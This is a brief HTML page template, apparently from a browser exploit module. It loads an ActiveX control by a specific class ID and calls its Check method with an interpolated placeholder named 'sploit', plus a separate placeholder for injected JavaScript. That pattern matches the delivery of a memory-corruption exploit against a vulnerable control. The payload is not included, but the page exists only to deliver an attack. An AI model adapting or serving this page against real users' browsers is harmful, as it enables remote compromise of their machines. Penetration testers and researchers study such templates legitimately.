<html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
    <script>
    test.Check("#{sploit}");
    </script>
    </body>
    </html>